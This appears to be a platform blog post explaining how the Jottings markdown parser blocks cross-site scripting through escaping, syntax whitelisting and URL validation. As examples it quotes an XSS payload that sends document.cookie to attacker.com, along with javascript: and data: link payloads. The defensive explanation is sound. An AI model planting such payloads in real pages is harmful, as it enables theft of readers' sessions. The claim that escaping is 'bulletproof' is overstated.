XSS Protection in Our Markdown Parser

XSS Protection in Our Markdown Parser

Building a platform where users publish content is exciting—but it comes with real responsibility. When you give people the ability to write and share, you need to think carefully about what they can inject into the system. That's why XSS (Cross-Site Scripting) protection isn't an afterthought at Jottings. It's baked into the foundation of how we parse and render markdown.

Let me walk you through why this matters, and how we actually prevent these attacks.

Why Should You Care About XSS?

Imagine someone pastes this into their Jottings post:

Check out my site: <img src=x onerror="fetch('https://attacker.com/steal?data='+document.cookie)">

Without proper protection, that malicious script executes in every reader's browser. It could steal cookies, redirect to phishing sites, or worse—compromise your entire site's security.

XSS attacks are particularly dangerous in platforms like Jottings because:

  • Reach: Your content is public. Attacks spread to every visitor.
  • Trust: Readers visit your site because they trust you. Compromising that is devastating.
  • Persistence: User-generated content lives in your database. The attack persists until you clean it up.

This isn't theoretical. Major platforms have been hit by XSS vulnerabilities. It's why we made security a core principle from day one.

Our Escaping Strategy

At Jottings, we take a simple but powerful approach: we escape HTML special characters before rendering markdown.

Here's the core principle: we treat all user input as plain text first. When we parse markdown, we don't allow arbitrary HTML tags. Instead, we parse markdown syntax (bold, italics, links, etc.) and generate safe HTML that can't contain malicious scripts.

The key insight is this: escaping is the default. We escape these dangerous characters:

  • < becomes &lt;
  • > becomes &gt;
  • & becomes &amp;
  • " becomes &quot;
  • ' becomes &#x27;

This means if someone tries to inject <script>alert('xss')</script>, it renders as plain text:

&lt;script&gt;alert('xss')&lt;/script&gt;

Which displays to readers as literal text, not executable code. The malicious intent is neutralized.

Our Specific Protections

We built these defenses into the Jottings markdown parser:

1. All User Input is Escaped by Default

In our processPlainText() function, every character that could start an HTML tag is escaped. This is the safety net that catches anything we might miss elsewhere.

// Pseudocode of our escaping logic
const escaped = input
  .replace(/&/g, '&amp;')
  .replace(/</g, '&lt;')
  .replace(/>/g, '&gt;')
  .replace(/"/g, '&quot;')
  .replace(/'/g, '&#x27;');

This happens automatically for non-PRO users. Even if someone tries to be clever with encoded characters or unusual HTML tricks, the escaping catches it.

2. Markdown Parser Only Allows Safe Syntax

Our custom markdown parser only recognizes specific markdown constructs:

  • Bold: **text**
  • Italic: *text* or _text_
  • Links: [text](url)
  • Code blocks: ```...```
  • Blockquotes: > text
  • Headings: # text

We don't parse HTML directly from user input. No <div> tags, no onclick handlers, no script tags. This fundamental design choice makes XSS attacks nearly impossible.

3. Link URLs Are Validated

Even URLs can be a vector for attacks. Someone might try:

[click me](javascript:alert('xss'))
[click me](data:text/html,<script>alert('xss')</script>)

We validate that links start with safe protocols: http://, https://, or mailto:. Anything else is stripped or converted to plain text.

4. Media Objects Preserve Source Information

When users share images or media, we embed the full metadata directly in the content:

{
  "type": "image",
  "url": "https://static.jottings.me/...",
  "filename": "safe-filename.jpg",
  "alt": "User provided alt text (also escaped)"
}

The URL comes directly from our CDN (static.jottings.me), so we control the source. User alt text is escaped like any other content. No surprise scripts hidden in attributes.

5. Build-Time HTML Generation

Here's a detail I'm proud of: we generate HTML at build time, not runtime. When you publish a jot, our build processor:

  1. Reads your raw markdown text
  2. Parses it with our custom parser
  3. Generates safe HTML
  4. Stores the static HTML on our CDN

This means:

  • No dynamic execution of untrusted code
  • Consistent rendering everywhere
  • We can audit every piece of HTML before it goes live
  • Performance is incredible (static files, cached globally)

Why This Matters Beyond Security

Beyond preventing attacks, our escaping strategy has benefits:

Predictability: You know exactly what markdown syntax we support. No surprises when your content renders.

Performance: Static HTML means your readers get lightning-fast page loads. No parsing happens in their browser.

Simplicity: Our approach is straightforward. We don't need complex HTML sanitizers that can miss edge cases. Escaping is bulletproof.

User Control: If you want to write about code, HTML, or dangerous concepts, you can. The text renders safely, and readers understand it's examples, not executable code.

A Trust Issue

Look, the reason I'm writing this is simple: Jottings is a publishing platform, and trust is everything.

When you publish here, you trust us to:

  • Keep your content private until you publish it
  • Display it safely to readers
  • Protect your readers from harm
  • Maintain the integrity of your work

XSS protection is just one part of that promise. But it's a crucial part. A single vulnerability could compromise that trust, and we can't have that.

Every design decision we made—the custom markdown parser, the build-time HTML generation, the escaped user input—comes down to this: you should be able to publish freely, and your readers should be able to browse safely.

Next Steps

If you're building your own platform and want to prevent XSS attacks, here's what I'd recommend:

  1. Escape by default: Treat user input as plain text unless proven safe
  2. Whitelist, don't blacklist: Only allow specific markdown syntax, not all HTML
  3. Validate URLs: Restrict protocols to safe ones (http, https, mailto)
  4. Use libraries carefully: If you use a markdown parser, understand how it handles security
  5. Test with malicious input: Try to break your own parser with known XSS payloads

We're open about how Jottings works because security through obscurity isn't real security. Our code is transparent, and we welcome security researchers to review it.

If you find a vulnerability or have suggestions for improving our protection, please reach out. Security is never "done"—it's an ongoing process of learning and improving.

That's the Jottings promise: a safe space to publish what matters to you.